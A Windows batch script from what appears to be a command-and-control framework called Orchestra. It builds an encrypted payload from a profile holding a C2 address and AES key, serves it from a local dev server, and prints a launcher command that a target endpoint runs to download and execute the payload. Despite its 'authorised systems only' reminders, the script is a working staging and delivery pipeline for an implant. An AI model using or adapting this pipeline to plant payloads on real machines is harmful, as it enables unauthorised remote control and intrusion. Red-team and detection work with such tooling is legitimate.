@echo off
REM quickbuild.bat - One-click Orchestra payload generator (Windows).
REM
REM Walks a fresh host through:
REM   1. Verifying that Rust is installed (offers rustup install URL if not).
REM   2. Running 'orchestra-builder setup' to verify build dependencies.
REM   3. Creating a default profile targeting Windows x86_64 if none exists.
REM   4. Building the payload.
REM   5. Starting the dev-server to serve the payload.
REM   6. Printing the exact launcher command to run on a target endpoint.
REM
REM This script is intended for use on systems you own or manage.

setlocal EnableDelayedExpansion

set "ROOT=%~dp0.."
pushd "%ROOT%" >nul

if not defined ORCHESTRA_QUICKBUILD_PROFILE set "ORCHESTRA_QUICKBUILD_PROFILE=quickbuild"
if not defined ORCHESTRA_QUICKBUILD_PORT    set "ORCHESTRA_QUICKBUILD_PORT=8000"

set "PROFILE_NAME=%ORCHESTRA_QUICKBUILD_PROFILE%"
set "PROFILE_PATH=profiles\%PROFILE_NAME%.toml"

REM --- 1. Rust toolchain ----------------------------------------------------

where cargo >nul 2>nul
if errorlevel 1 (
    echo [quickbuild] Rust ^(cargo^) was not found on PATH.
    echo [quickbuild] Install Rust from https://rustup.rs/ then re-run this script.
    popd >nul
    exit /b 1
)

for /f "delims=" %%v in ('cargo --version') do echo [quickbuild] %%v

REM --- 2. Builder bring-up --------------------------------------------------

set "BUILDER_BIN=%ROOT%\target\release\orchestra-builder.exe"
if not exist "%BUILDER_BIN%" (
    echo [quickbuild] Building orchestra-builder ^(release^)...
    cargo build --release -p builder || goto :err
)

echo [quickbuild] Running 'orchestra-builder setup --auto-install'...
"%BUILDER_BIN%" setup --auto-install

REM --- 3. Profile -----------------------------------------------------------

if not exist profiles mkdir profiles
if not exist dist     mkdir dist

if not exist "%PROFILE_PATH%" (
    echo [quickbuild] No profile '%PROFILE_NAME%' found - creating a default one.
    REM Generate a 32-byte AES key as base64 via PowerShell.
    for /f "delims=" %%K in ('powershell -NoProfile -Command "[Convert]::ToBase64String((1..32 ^| ForEach-Object {Get-Random -Maximum 256}))"') do set "PROFILE_KEY=%%K"
    (
        echo # Auto-generated by scripts\quickbuild.bat
        echo target_os      = "windows"
        echo target_arch    = "x86_64"
        echo c2_address     = "127.0.0.1:7890"
        echo encryption_key = "!PROFILE_KEY!"
        echo features       = []
        echo package        = "launcher"
    ) > "%PROFILE_PATH%"
    echo [quickbuild] Wrote %PROFILE_PATH%
) else (
    echo [quickbuild] Re-using existing profile %PROFILE_PATH%
)

REM Re-read the key from disk so it works whether or not we just wrote it.
for /f "tokens=2 delims==" %%K in ('findstr /b "encryption_key" "%PROFILE_PATH%"') do (
    set "PROFILE_KEY=%%~K"
)
set "PROFILE_KEY=!PROFILE_KEY: =!"
set "PROFILE_KEY=!PROFILE_KEY:"=!"

REM --- 4. Build payload -----------------------------------------------------

echo [quickbuild] Building payload for profile '%PROFILE_NAME%'...
"%BUILDER_BIN%" build "%PROFILE_NAME%" || goto :err

set "PAYLOAD=dist\%PROFILE_NAME%.enc"
if not exist "%PAYLOAD%" (
    echo [quickbuild] ERROR: expected %PAYLOAD% to exist after build.
    goto :err
)

REM --- 5. Dev server --------------------------------------------------------

set "LAUNCHER_BIN=%ROOT%\target\release\launcher.exe"
if not exist "%LAUNCHER_BIN%" (
    echo [quickbuild] Building launcher binary so you can copy it to a target...
    cargo build --release -p launcher || goto :err
)

echo.
echo ================================================================================
echo   Quickbuild complete.
echo.
echo   Payload:        %PAYLOAD%
echo   Encryption key: !PROFILE_KEY!
echo   Dev server:     http://127.0.0.1:%ORCHESTRA_QUICKBUILD_PORT%/%PROFILE_NAME%.enc
echo.
echo   Copy %LAUNCHER_BIN%
echo   to your TEST endpoint and run:
echo.
echo       launcher.exe --url http://^<this-host^>:%ORCHESTRA_QUICKBUILD_PORT%/%PROFILE_NAME%.enc --key "!PROFILE_KEY!"
echo.
echo   Reminder: only deploy to systems you own or are authorised to manage.
echo ================================================================================
echo.

cargo run --release -p dev-server -- --port %ORCHESTRA_QUICKBUILD_PORT%
set "RC=%errorlevel%"
popd >nul
exit /b %RC%

:err
popd >nul
exit /b 1
